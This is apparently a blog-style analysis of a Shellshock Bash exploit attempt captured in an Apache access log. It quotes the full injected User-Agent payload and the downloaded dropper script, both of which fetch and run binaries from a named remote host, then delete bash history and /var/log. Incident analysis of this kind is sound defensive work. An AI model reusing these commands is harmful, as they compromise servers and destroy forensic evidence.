Bash Vulnerability

Bash Vulnerability is a family of security bugs in the widely used Unix Bash shell. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Here real life example that. In apache access log at User-Agent Header are linux commands:

185.125.32.54 - - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"mkdir /var/.udp; wget http://exe.ugotownedz.org/.udp/getbinaries.sh -O /tmp/upfile.sh;wget http://exe.ugotownedz.org/.udp/getbinaries.sh -O /tmp/upfile.sh;curl -o /tmp/upfile.sh http://exe.ugotownedz.org/.udp/getbinaries.sh;cd /tmp/; GET http://exe.ugotownedz.org/.udp/getbinaries.sh;fetch http://exe.ugotownedz.org/.udp/getbinaries.sh;lwp-download http://exe.ugotownedz.org/.udp/getbinaries.sh;mv /tmp/getbinaries.sh /tmp/upfile.sh ; cat /tmp/upfile.sh |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\""

If we look first, we found domain exe.ugotownedz.org where wget, or other linux shell download tools try download more code (getbinaries.sh).

First look that domain pointing 4 servers, where download bash script.

#host exe.ugotownedz.org
exe.ugotownedz.org has address 96.35.170.54
exe.ugotownedz.org has address 110.10.178.146
exe.ugotownedz.org has address 177.39.141.197
exe.ugotownedz.org has address 189.28.176.35

Now we downloaded getbinaries.sh and looked inside that bash script:

mkdir /tmp/.udp
echo z1 >> /tmp/upfile
echo z2 >> /tmp/upfile
echo z3 >> /tmp/upfile
echo z4 >> /tmp/upfile
echo z5 >> /tmp/upfile
echo z6 >> /tmp/upfile
echo z7 >> /tmp/upfile
echo z8 >> /tmp/upfile
echo z9 >> /tmp/upfile
echo z10 >> /tmp/upfile
echo z11 >> /tmp/upfile
echo z12 >> /tmp/upfile
echo d2 >> /tmp/upfile
echo d3	>> /tmp/upfile
echo d4	>> /tmp/upfile
echo d5	>> /tmp/upfile
echo d6	>> /tmp/upfile
echo d7	>> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget http://exe.ugotownedz.org/.udp/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file ; done
for file2 in $(cat /tmp/upfile); do killall $file2; cd /tmp/.udp; ls /tmp/.udp/$file2 || GET http://exe.ugotownedz.org/.udp/$file2; chmod +x $file2 ; /tmp/.udp/$file2 ; done
for file3 in $(cat /tmp/upfile); do killall $file3; cd /tmp/.udp; ls /tmp/.udp/$file3 || fetch http://exe.ugotownedz.org/.udp/$file3; chmod +x $file3 ; /tmp/.udp/$file3 ; done
for file4 in $(cat /tmp/upfile); do killall $file4; cd /tmp/.udp; ls /tmp/.udp/$file4 || lwp-download http://exe.ugotownedz.org/.udp/$file4; chmod +x $file4; /tmp/.udp/$file4 ; done
for file5 in $(cat /tmp/upfile); do killall $file5; cd /tmp/.udp; ls /tmp/.udp/$file5 || curl -o http://exe.ugotownedz.org/.udp/$file5; chmod +x $file5; /tmp/.udp/$file5 ; done
rm -rf /tmp/upfile
rm -rf /root/.bash_history

Then source code delete d2,d3,d4,d5,d6,d7 files, we dont know why and then it run downloaded binaries and remove itself and all logs to hide itself.

mv /tmp/getbinaries.sh /tmp/upfile.sh ; cat /tmp/upfile.sh |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\"

Dont try run these script, because domain is still active and we dont know what these binaries does in linux environment. I dont have time at moment setup sandbox and test these binaries at moment!